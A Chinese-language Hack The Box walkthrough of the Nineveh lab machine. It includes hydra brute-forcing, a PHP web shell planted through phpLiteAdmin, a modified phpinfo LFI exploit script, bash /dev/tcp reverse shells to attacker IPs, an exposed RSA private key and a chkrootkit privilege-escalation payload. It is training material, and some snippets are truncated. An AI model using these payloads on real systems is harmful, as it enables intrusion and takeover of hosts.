nmap -sC -sV 10.10.10.43 Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-26 16:22 CST Nmap scan report for 10.10.10.43 Host is up (0.36s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). 443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: 400 Bad Request | ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR | Not valid before: 2017-07-01T15:03:30 |_Not valid after: 2018-07-01T15:03:30 |_ssl-date: TLS randomness does not represent time | tls-alpn: |_ http/1.1 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 85.66 seconds
发现开了80和443,然后443端口上有一个证书,暴漏了一个虚拟域名
80端口勘探注意,从这一个靶场开始,我决定了以后由dirsearch转用gobuster
gobuster dir -u http://10.10.10.43 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php -t 20 =============================================================== Gobuster v3.1.0 by OJ Reeves (@Thecolonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.10.43 [+] Method: GET [+] Threads: 20 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Extensions: php [+] Timeout: 10s =============================================================== 2021/12/26 16:27:29 Starting gobuster in directory enumeration mode =============================================================== /info.php (Status: 200) [Size: 83695] /department (Status: 301) [Size: 315] [--> http://10.10.10.43/department/]
发现了几个敏感目录
info.php就是phpinfo界面
/department是一个登陆界面
443端口直接gobuster扫
gobuster dir -k -u https://10.10.10.43 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php -t 20 =============================================================== Gobuster v3.1.0 by OJ Reeves (@Thecolonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: https://10.10.10.43 [+] Method: GET [+] Threads: 20 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Extensions: php [+] Timeout: 10s =============================================================== 2021/12/26 16:35:34 Starting gobuster in directory enumeration mode =============================================================== /db (Status: 301) [Size: 309] [--> https://10.10.10.43/db/] /server-status (Status: 403) [Size: 300] /secure_notes (Status: 301) [Size: 319] [--> https://10.10.10.43/secure_notes/]
发现三个敏感目录
域名勘探此处思路来源于0xdf,因为我自己根本没注意这个,这个是后期整理笔记看大佬思路发现的。这个-hh还是理解不了是什么东西
root@kali# wfuzz -c -u http://10.10.10.43/ -H "Host: FUZZ.nineveh.htb" -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt --hh 178 ******************************************************** * Wfuzz 2.4.5 - The Web Fuzzer * ******************************************************** Target: http://10.10.10.43/ Total requests: 100000 =================================================================== ID Response Lines Word Chars Payload =================================================================== Total time: 206.0595 Processed Requests: 100000 Filtered Requests: 100000 Requests/sec.: 485.2965获取www权限 第一种方法
80端口
注意两个用户名的回显,发现一个问题,他登录验证的用户名和密码是分开的,也就是说,我们可以试出来他的用户名
发现用户名是admin
那么试试以数组方式提交密码的phpbug
用burp改包
由password=。。。修改为
password[]= 就行
此处同样可以用hydra爆破一下密码,密码是1q2w3e4r5t
成功了
试一试唯一有用的notes发现,有文件包含路径和数据库回显
那么可以测一测文件包含
修改路径测试文件包含
发现了一个问题,他的验证应该是检验的/ninevehNotes这个字段如果没有就会报No Note is selected字样
好了,这个先挂起,知道这里有一个文件包含漏洞
443端口
先看看db路径
是一个phpliteadmin的登录面板,用来管理数据库
这个面板的1.9版本存在一个漏洞
可以把数据库的后缀名改为php,并在表中写入php语句
但是需要一个前提,就是需要知道密码,进入面板,那么用burp爆破发现是弱口令,我第一次用了一个100的小字典没跑出来。。。
这里可以使用hydra来跑字典
I’ll run hydra with the following options:
-l 0xdf - hydra requires a username, even if it won’t use it-P [password file] - a file of passwords to tryhttps-post-form-this is the plugin to use, which takes a string with three parts,
:separated:
/db/index.php - the path to POST topassword=^PASS^&remember=yes&login=Log+In&proc_login=true - the POST data, with ^PASS^ being the thing that will be replaced with words from the wordlistIncorrect password - text on the response that indicates failure to login
It finds the password very quickly:
root@kali# hydra 10.10.10.43 -l 0xdf -P /usr/share/seclists/Passwords/twitter-banned.txt https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password" Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-04-11 06:03:28 [DATA] max 16 tasks per 1 server, overall 16 tasks, 397 login tries (l:1/p:397), ~25 tries per task [DATA] attacking http-post-forms://10.10.10.43:443/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password [443][http-post-form] host: 10.10.10.43 login: 0xdf password: password123 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-04-11 06:03:36from 0xdf
密码是password123
进入之后会发现有一个test数据库,那么我们需要去利用漏洞
步骤是
1.创建一个以.php为后缀的datebase
2.创建一个新table,fields为1就行
3.新表的field随便填type选text,default value填
system($_REQUEST[cmd]);
注意补成php语句,为了过windows不能加格式
这样直接创建就行
在最开始的面板有写这个文件创建在哪,那么我们可以利用80端口的文件包含来访问
发现执行成功
那么直接把参数改成转发shell
bash -c 'bash -i >%26 /dev/tcp/10.10.16.2/4444 0>%261'
然后开着nc监听
拿到www-data权限
第1.5种方法使用这个phpLiteAdmin漏洞就是在本地中编写一个漏洞,用wget下载,改名后,直接利用
同样时在default value处填写指令
这样,然后,在本地编写一个shell.txt文件,然后用python打开微服务
python3 -m SimpleHTTPServer 80
然后-o是把txt文件改名为php文件,因为如果一开始就是php文件,这个回连脚本就会在本地执行
shell.txt就写
&3 2>&3"); ?>
这时,我们再用RFI触发就行
第二种方法复现没有成功
phpinfo引发的文件上传漏洞
在info中发现
file_uploads On On
这么一条,那么我们可以利用之前的文件包含,加上这个文件上传实现shell的转发
那么如何上传文件
刷新phpinfo界面得到一个get请求包,然后把他修改为一个post请求包来尝试上传文件
POST /info.php HTTP/1.1 Host: 10.10.10.43 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close cookie: PHPSESSID=ehjpe8sp040ma068aen884obr7 Upgrade-Insecure-Requests: 1 Content-Length: 194 Content-Type: multipart/form-data; boundary=---------------------------7db268605ae -----------------------------7db268605ae Content-Disposition: form-data; name="dummyname"; filename="test.txt" Content-Type: text/plainSecurity Test -----------------------------7db268605ae
这样,然后可以在phpinfo界面看到上传文件的具体信息,包括文件上传的位置,那么验证了存在文件上传漏洞
我们可以选择一个python脚本来实现它https://www.insomniasec.com/downloads/publications/phpinfolfi.py
这个,我放在同名文件夹下了,需要自取
然后我们仍然需要修改脚本中的一些东西
1.修改REQ1中的地址 POST /phpinfo.php改成/info.php
2.修改payload为转发shell,并配置相应参数
3.修改下面的get请求地址为我们之前获得的存在RFI漏洞的地址
修改为这样
local_ip = "10.10.14.24" local_port = 443 phpsessid = "ehjpe8sp040ma068aen884obr7" # 设置参数 def setup(host, port): TAG="Security Test" PAYLOAD="""%sr & /dev/tcp/%s/%d 0>&1'");?>r""" % (TAG, local_ip, local_port) REQ1_DATA="""-----------------------------7dbff1ded0714r Content-Disposition: form-data; name="dummyname"; filename="test.txt"r Content-Type: text/plainr r %s -----------------------------7dbff1ded0714--r""" % PAYLOAD padding="A" * 5000 REQ1="""POST /info.php?a="""+padding+""" HTTP/1.1r cookie: PHPSESSID=""" + phpsessid + """; othercookie="""+padding+"""r HTTP_ACCEPT: """ + padding + """r HTTP_USER_AGENT: """+padding+"""r HTTP_ACCEPT_LANGUAGE: """+padding+"""r HTTP_PRAGMA: """+padding+"""r Content-Type: multipart/form-data; boundary=---------------------------7dbff1ded0714r Content-Length: %sr Host: %sr r %s""" %(len(REQ1_DATA),host,REQ1_DATA) #modify this to suit the LFI script LFIREQ="""GET /department/manage.php?notes=/ninevehNotes/..%s HTTP/1.1r User-Agent: Mozilla/4.0r Proxy-Connection: Keep-Aliver cookie: PHPSESSID=""" + phpsessid + """r Host: %sr r r """ return (REQ1, TAG, LFIREQ)提权至amrols
目前已经使用的攻击向量有,443的db,80的全部
那么看一下剩余的443的secure_notes目录
发现是一张图片,不可能就给一张毫无用处的图片,那么下载下来看看是不是有图片隐写
www-data@nineveh:/var/www/ssl/secure_notes$ strings nineveh.png www-data -----BEGIN RSA PRIVATE KEY----- MIIEowIBAAKCAQEAri9EUD7bwqbmEsEpIeTr2KGP/wk8YAR0Z4mmvHNJ3UfsAhpI H9/Bz1abFbrt16vH6/jd8m0urg/Em7d/FJncpPiIH81JbJ0pyTBvIAGNK7PhaQXU PdT9y0xEEH0apbJkuknP4FH5Zrq0nhoDTa2WxXDcSS1ndt/M8r+eTHx1bVznlBG5 FQq1/wmB65c8bds5tETlacr/15Ofv1A2j+vIdggxNgm8A34xZiP/WV7+7mhgvcnI 3oqwvxCI+VGhQZhoV9Pdj4+D4l023Ub9KyGm40tinCXePsMdY4KOLTR/z+oj4sQT X+/1/xcl61LADcYk0Sw42bOb+yBEyc1TTq1NEQIDAQABAoIBAFvDbvvPgbr0bjTn KiI/FbjUtKWpWfNDpYd+TybsnbdD0qPw8JpKKTJv79fs2KxMRVCdlV/IAVWV3QAk FYDm5gTLIfuPDOV5jq/9Ii38Y0DozRGlDoFcmi/mB92f6s/sQYCarjcBOKDUL58z GRZtIwb1RDgRAXbwxGoGZQDqeHqaHciGFOugKQJmupo5hXOkfMg/G+Ic0Ij45uoR JZecF3lx0kx0Ay85DcBkoYRiyn+nNgr/APJBXe9Ibkq4j0lj29V5dT/HSoF17VWo 9odiTBWwwzPVv0i/JEGc6sXUD0mXevoQIA9SkZ2OJXO8JoaQcRz628dOdukG6Utu Bato3bkCgYEA5w2Hfp2Ayol24bDejSDj1Rjk6REn5D8TuELQ0cffPujZ4szXW5Kb ujOUscFgZf2P+70UnaceCCAPNYmsaSVSCM0KCJQt5klY2DLWNUaCU3OEpREIWkyl 1tXMOZ/T5fV8RQAZrj1BMxl+/UiV0IIbgF07sPqSA/uNXwx2cLCkhucCgYEAwP3b vCMuW7qAc9K1Amz3+6dfa9bngtMjpr+wb+IP5UKMuh1mwcHWKjFIF8zI8CY0Iakx DdhOa4x+0MQEtKXtgaADuHh+NGCltTLLckfEAMNGQHfBgWgBRS8EjXJ4e55hFV89 P+6+1FXXA1r/Dt/zIYN3Vtgo28mNNyK7rCr/pUcCgYEAgHMDCp7hRLfbQWkksGzC fGuUhwWkmb1/ZwauNJHbSIwG5ZFfgGcm8ANQ/Ok2gDzQ2PCrD2Iizf2UtvzMvr+i tYXXuCE4yzenjrnkYEXMmjw0V9f6PskxwRemq7pxAPzSk0GVBUrEfnYEJSc/MmXC iEBMuPz0RAaK93ZkOg3Zya0CgYBYbPhdP5FiHhX0+7pMHjmRaKLj+lehLbTMFlB1 MxMtbEymigonBPVn56Ssovv+bMK+GZOMUGu+A2WnqeiuDMjB99s8jpjkztOeLmPh PNilsNNjfnt/G3RZiq1/Uc+6dFrvO/AIdw+goqQduXfcDOiNlnr7o5c0/Shi9tse i6UOyQKBgCgvck5Z1iLrY1qO5iZ3uVr4pqXHyG8ThrsTffkSVrBKHTmsXgtRhHoc il6RYzQV/2ULgUBfAwdZDNtGxbu5oIUB938TCaLsHFDK6mSTbvB/DywYYScAWwF7 fw4LVXdQMjNJC3sn3JaqY1zJkE4jXlZeNQvCx4ZadtdJD9iO+EUG -----END RSA PRIVATE KEY----- secret/nineveh.pub 0000644 0000041 0000041 00000000620 13126060277 014541 ustar www-data www-data ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCuL0RQPtvCpuYSwSkh5OvYoY//CTxgBHRniaa8c0ndR+wCGkgf38HPVpsVuu3Xq8fr+N3ybS6uD8Sbt38Umdyk+IgfzUlsnSnJMG8gAY0rs+FpBdQ91P3LTEQQfRqlsmS6Sc/gUflmurSeGgNNrZbFcNxJLWd238zyv55MfHVtXOeUEbkVCrX/CYHrlzxt2zm0ROVpyv/Xk5+/UDaP68h2CDE2CbwDfjFmI/9ZXv7uaGC9ycjeirC/EIj5UaFBmGhX092Pj4PiXTbdRv0rIabjS2KcJd4+wx1jgo4tNH/P6iPixBNf7/X/FyXrUsANxiTRLDjZs5v7IETJzVNOrU0R [email protected]
发现了amrois的私匙,那么可以尝试一下ssh连接,但是我们意识到一个问题,我们nmap扫描的时候没发现对方的22端口是打开的
knockd端口此处在/var/mail/amrois这个信箱中留下了一段邮件
$ cat /var/mail/amrois From [email protected] Fri Jun 23 14:04:19 2017 Return-Path:X-Original-To: amrois Delivered-To: [email protected] Received: by nineveh.htb (Postfix, from userid 1000) id D289B2E3587; Fri, 23 Jun 2017 14:04:19 -0500 (CDT) To: [email protected] From: [email protected] Subject: Another important note! Message-Id: <[email protected]> Date: Fri, 23 Jun 2017 14:04:19 -0500 (CDT) Amrois! please knock the door next time! 571 290 911
发现,涉及到一个应用knock,需要用对应的密匙敲击窗口才能使对应窗口开放
可以用 ps auxww看一下运行的进程,发现果然,运行着knockd这个应用
那么首先需要先查找knock的口令
查看knockd配置文件
www-data@nineveh:/var/www/ssl/secure_notes$ cat /etc/knockd.conf cat /etc/knockd.conf [options] logfile = /var/log/knockd.log interface = ens160 [openSSH] sequence = 571, 290, 911 seq_timeout = 5 start_command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags = syn [closeSSH] sequence = 911,290,571 seq_timeout = 5 start_command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags = syn
看到口令是571 290 911
然后我们另开一个shell敲击端口,不会有回显
root@Mr)-[~] └─# knock 10.10.10.43 571 290 911
同样我们也可以使用nmap来敲击窗口
nmap -Pn --host-timeout 201 --max-retries 0 -p 571,290,911 10.10.10.4
然后可以用telnet验证一下是否打开端口
┌──(root@Mr)-[~] └─# telnet 10.10.10.43 22 130 ⨯ Trying 10.10.10.43... Connected to 10.10.10.43. Escape character is '^]'. SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.2 quit Protocol mismatch. Connection closed by foreign host.
有反馈证明已经打开了
那么我们使用ssh用私钥连接
使用私钥连接ssh创建一个文件命名为id.rsa,将刚刚隐写在图片中的私钥粘贴在其中
-----BEGIN RSA PRIVATE KEY----- MIIEowIBAAKCAQEAri9EUD7bwqbmEsEpIeTr2KGP/wk8YAR0Z4mmvHNJ3UfsAhpI H9/Bz1abFbrt16vH6/jd8m0urg/Em7d/FJncpPiIH81JbJ0pyTBvIAGNK7PhaQXU PdT9y0xEEH0apbJkuknP4FH5Zrq0nhoDTa2WxXDcSS1ndt/M8r+eTHx1bVznlBG5 FQq1/wmB65c8bds5tETlacr/15Ofv1A2j+vIdggxNgm8A34xZiP/WV7+7mhgvcnI 3oqwvxCI+VGhQZhoV9Pdj4+D4l023Ub9KyGm40tinCXePsMdY4KOLTR/z+oj4sQT X+/1/xcl61LADcYk0Sw42bOb+yBEyc1TTq1NEQIDAQABAoIBAFvDbvvPgbr0bjTn KiI/FbjUtKWpWfNDpYd+TybsnbdD0qPw8JpKKTJv79fs2KxMRVCdlV/IAVWV3QAk FYDm5gTLIfuPDOV5jq/9Ii38Y0DozRGlDoFcmi/mB92f6s/sQYCarjcBOKDUL58z GRZtIwb1RDgRAXbwxGoGZQDqeHqaHciGFOugKQJmupo5hXOkfMg/G+Ic0Ij45uoR JZecF3lx0kx0Ay85DcBkoYRiyn+nNgr/APJBXe9Ibkq4j0lj29V5dT/HSoF17VWo 9odiTBWwwzPVv0i/JEGc6sXUD0mXevoQIA9SkZ2OJXO8JoaQcRz628dOdukG6Utu Bato3bkCgYEA5w2Hfp2Ayol24bDejSDj1Rjk6REn5D8TuELQ0cffPujZ4szXW5Kb ujOUscFgZf2P+70UnaceCCAPNYmsaSVSCM0KCJQt5klY2DLWNUaCU3OEpREIWkyl 1tXMOZ/T5fV8RQAZrj1BMxl+/UiV0IIbgF07sPqSA/uNXwx2cLCkhucCgYEAwP3b vCMuW7qAc9K1Amz3+6dfa9bngtMjpr+wb+IP5UKMuh1mwcHWKjFIF8zI8CY0Iakx DdhOa4x+0MQEtKXtgaADuHh+NGCltTLLckfEAMNGQHfBgWgBRS8EjXJ4e55hFV89 P+6+1FXXA1r/Dt/zIYN3Vtgo28mNNyK7rCr/pUcCgYEAgHMDCp7hRLfbQWkksGzC fGuUhwWkmb1/ZwauNJHbSIwG5ZFfgGcm8ANQ/Ok2gDzQ2PCrD2Iizf2UtvzMvr+i tYXXuCE4yzenjrnkYEXMmjw0V9f6PskxwRemq7pxAPzSk0GVBUrEfnYEJSc/MmXC iEBMuPz0RAaK93ZkOg3Zya0CgYBYbPhdP5FiHhX0+7pMHjmRaKLj+lehLbTMFlB1 MxMtbEymigonBPVn56Ssovv+bMK+GZOMUGu+A2WnqeiuDMjB99s8jpjkztOeLmPh PNilsNNjfnt/G3RZiq1/Uc+6dFrvO/AIdw+goqQduXfcDOiNlnr7o5c0/Shi9tse i6UOyQKBgCgvck5Z1iLrY1qO5iZ3uVr4pqXHyG8ThrsTffkSVrBKHTmsXgtRhHoc il6RYzQV/2ULgUBfAwdZDNtGxbu5oIUB938TCaLsHFDK6mSTbvB/DywYYScAWwF7 fw4LVXdQMjNJC3sn3JaqY1zJkE4jXlZeNQvCx4ZadtdJD9iO+EUG -----END RSA PRIVATE KEY-----
注意格式需要以
-----BEGIN RSA PRIVATE KEY-----开始
-----END RSA PRIVATE KEY-----结束
最后记得将密匙文件的权限改为600
chmod 600 id.rsa
然后再shell中使用rsa登录ssh
┌──(root@Mr)-[~] └─# ssh -i id.rsa [email protected] Ubuntu 16.04.2 LTS Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64) * documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 288 packages can be updated. 207 updates are security updates. You have mail. Last login: Mon Jul 3 00:19:59 2017 from 192.168.0.14
连接成功
快速利用方法 KnockThis wiki page gives a good example of using nmap to port knock. I’ll write it as a one liner:
root@kali# for i in 571 290 911; do > nmap -Pn --host-timeout 100 --max-retries 0 -p $i 10.10.10.43 >/dev/null > done; ssh -i ~/keys/id_rsa_nineveh_amrois [email protected] Ubuntu 16.04.2 LTS Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64) * documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 133 packages can be updated. 66 updates are security updates. You have mail. Last login: Wed Apr 22 05:34:21 2020 from 10.10.14.24 amrois@nineveh:~$
It loops over the three ports, and for each scans Nineveh with nmap using a short timeout and no retries, directing the output to /dev/null. Then it connects with SSH.
这样方法好像没有用到knockd指令
提权至root用户因为使用ssh密匙登录,那么我们无法使用sudo查看不了有root权限的应用,用find查找有4000权限的应用也无大的收获,uname -u发现内核版本4.4.0可以用内核提权,但上次用过了,而且用后来发现的漏洞有作弊的嫌疑
没什么思路,看了一眼0xdf的wp,上面用linpeas那个阴间脚本扫了一下,发现有个report的目录可能有敏感信息
那么我们打开看看
amrois@nineveh:/report$ cat report-21-12-26:06:40.txt ROOTDIR is `/' Checking `amd'... not found Checking `basename'... not infected Checking `biff'... not found Checking `chfn'... not infected Checking `chsh'... not infected Checking `cron'... not infected Checking `crontab'... not infected Checking `date'... not infected Checking `du'... not infected Checking `dirname'... not infected Checking `echo'... not infected Checking `egrep'... not infected Checking `env'... not infected Checking `find'... not infected Checking `fingerd'... not found Checking `gpm'... not found Checking `grep'... not infected Checking `hdparm'... not infected Checking `su'... not infected Checking `ifconfig'... not infected Checking `inetd'... not tested Checking `inetdconf'... not found Checking `identd'... not found Checking `init'... not infected Checking `killall'... not infected Checking `ldsopreload'... can't exec ./strings-static, not tested Checking `login'... not infected Checking `ls'... not infected Checking `lsof'... not infected Checking `mail'... not found Checking `mingetty'... not found Checking `netstat'... not infected Checking `named'... not found Checking `passwd'... not infected Checking `pidof'... not infected Checking `pop2'... not found Checking `pop3'... not found Checking `ps'... not infected Checking `pstree'... not infected Checking `rpcinfo'... not found Checking `rlogind'... not found Checking `rshd'... not found Checking `slogin'... not infected Checking `sendmail'... not found Checking `sshd'... not infected Checking `syslogd'... not tested Checking `tar'... not infected Checking `tcpd'... not infected Checking `tcpdump'... not infected Checking `top'... not infected Checking `telnetd'... not found Checking `timed'... not found
发现是什么,明显的chkrootkit报告,可以试试chkrootkit提权漏洞
可以用searchsploit来查看具体的漏洞利用方法
大致就是在/tmp文件夹中输入转发shell的语句,然后等有root权限的chkrootkit扫过来的时候语句会被执行,这个漏洞给并不需要amrols权限使用www就可以实现
amrois@nineveh:/tmp$ echo -e '#!/bin/bashnnbash -i >& /dev/tcp/10.10.16.2/4444 0>&1' > update amrois@nineveh:/tmp$ chmod +x update
然后我们开着端口监听,就能接收到shell
──(root@Mr)-[~] └─# nc -vlnp 4444 listening on [any] 4444 ... connect to [10.10.16.2] from (UNKNOWN) [10.10.10.43] 36250 bash: cannot set terminal process group (20694): Inappropriate ioctl for device bash: no job control in this shell root@nineveh:~#
以上
0xdf有提及使用这个软件进行扫描
pspy扫描一下当前存在的进程
感谢0xdf 提权至root时提供的思路,后期整理笔记时材料支持
v3ded 提供的方法1.5HackTheBox - Nineveh writeup (v3ded.github.io)
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)